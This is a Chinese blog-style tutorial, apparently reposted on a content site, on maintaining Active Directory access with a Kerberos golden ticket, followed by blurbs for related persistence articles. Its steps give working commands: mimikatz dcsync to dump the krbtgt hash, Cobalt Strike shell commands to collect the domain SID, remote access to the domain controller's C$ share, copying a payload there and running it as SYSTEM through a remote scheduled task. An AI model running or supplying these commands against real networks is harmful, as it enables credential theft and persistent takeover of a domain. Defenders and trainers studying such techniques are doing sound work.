黄金票据权限维持

这篇具有很好参考价值的文章主要介绍了黄金票据权限维持。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

黄金票据权限维持

目录
  • 黄金票据权限维持
    • 一、Krbtgt账户介绍
    • 二、黄金票据原理
    • 三、实验前提
    • 四、实验步骤

一、Krbtgt账户介绍

krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机。

二、黄金票据原理

TGT=Krbtgt的NTLM哈希加密

1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS返回的,TGT它是由Krbtgt加密和签名的,krbtgt的 NTLM Hash又是固定的,而CT_SK并不会保存在KDC中。

2、所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key(CT_SK)。

3、Client与TGS的交互中,而已有了黄金票据后(TGT),就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

三、实验前提

已经控制了域名并且使用域管理员登录或者提权的system。

条件如下:

1、域名称
2、域的SID值
3、域的krbtgt账号的NTLM哈希
4、伪造任意用户名(这个可以随意)

四、实验步骤

1、获取关键信息

shell whoami /user 获取域名和SID
shell net config workstation 获取完整域名
shell wmic useraccount list brief 获取域名和SID
shell net time /domain 获取域主机名

2、使用mimikatz导出krbtgt的NTLM哈希

mimikatz lsadump::dcsync /domain:candada.com /user:krbtgt

3、拿到这些信息可以利用CS做黄金票据

4、做完后可以利用dir远程访问域控

shell dir \\dc.candada.com\c$

5、使用计划任务上线cs

(1)远程复制文件

shell copy c:\users\administrator\desktop\can.exe \\dc.candada.com\c$

(2)设置计划任务到域控

shell schtasks /create /s dc.candada.com /tn test /sc onstart /tr c:\can.exe /ru system /f

(3)启动计划任务

shell schtasks /run /s dc.candada.com /i /tn "test"

(4)删除计划任务文章来源地址https://www.toymoban.com/news/detail-490236.html

shell schtasks /delete /s dc.candada.com /tn "test" /f

到了这里,关于黄金票据权限维持的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Windows权限维持--创建隐藏账户(影子账户)

    影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持。 1、创建

    2024年02月12日
    浏览(28)
  • 巧用OpenSSH进行域内权限维持

    最近在Windows服务器上安装OpenSSH,意外发现了一个很有意思的技巧,可用来做域内权限维持,废话不多说,直接上步骤。 01、利用方式 (1)在已经获得权限的Windows服务器上,使用msiexec安装openssh,一行命令静默安装,不需要任何设置。 (2)在默认安装的情况下,配置文件:

    2024年02月06日
    浏览(45)
  • windows权限维持—SSP&HOOK&DSRM&SIDhistory&SkeletonKey

      在内网中权限维持是非常重要的一部分,很多的时候再拿下一台服务器的时候,如果没做权限维持,可能今天你还能登陆或者访问,明天你就无法访问了,当然也不排除存在那些服务器常年没人管的情况,像这类的服务器基本上都是存在一些小企业,只要服务器正常运行

    2024年02月12日
    浏览(36)
  • 持久化:Linux利用SUID、任务计划、vim进行权限维持

    目录 利用Linux SUID进行权限维持 利用Linux计划任务进行权限维持 利用Vim创建后门 利用CVE-2019-12735进行权限维持 使用Vim运行Python后门程序 在前面我们使用Linux的SUID权限进行了权限提升,然后SUID还可以用来进行持久化 利用SUID我们可以解除低权限用户获取高权限,但是这种手段

    2024年02月20日
    浏览(56)
  • 【权限维持】Windows&自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

    1、自启动路径加载 将后门放置该目录,服务器重启即上线 2、自启动服务加载 3、自启动注册表加载 -当前用户键值 -服务器键值(需要管理员权限) -添加启动项 4、计划计时任务 参考前面横向移动 远程连接时,连按五下shift键可以打开粘滞键 系统自带的辅助功能进行替换执

    2024年02月07日
    浏览(44)
  • Windows权限维持—自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

      在Windows系统中,很多后门利用的方式不是太会区别在域中还是单机上,只是需要考虑在没有网络情况下,如何将shell反弹回来,就比如,在域中一个无网络的主机和一台有网络的主机,前期通过有网络的主机转发上线到无网络主机上,那么我们木马是不是也可以这样设置

    2024年02月12日
    浏览(44)
  • Ctfshow web入门 权限维持篇 web670-web679 详细题解 全

    补充一下PHP中单双引号的区别: 单引号和双引号之间最显着的区别在于我们插入字符串和变量时。单引号不插入字符串和变量。单引号内的内容会按原样打印出来。在大多数情况下,单引号内没有任何变量或转义序列的编译。 但是,在双引号的情况下,写在引号内的变量将

    2024年02月11日
    浏览(36)
  • 内网渗透之权限维持-自启动&映像劫持&粘滞键&辅助屏保后门&WinLogon

    以下几种方法都需服务器重启 1、自启动路径加载 C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup 将木马放到此目录,等待服务器重启即可 2、自启动服务加载 3、自启动注册表加载 -当前用户键值 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun -服务器键值(

    2024年02月06日
    浏览(53)
  • 错误票据题解

    先对数组进行排序,然后遍历数组,如果出现两个一样的,就是重号,如果连续的两个数之间相差大于1就是断号

    2024年02月22日
    浏览(56)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包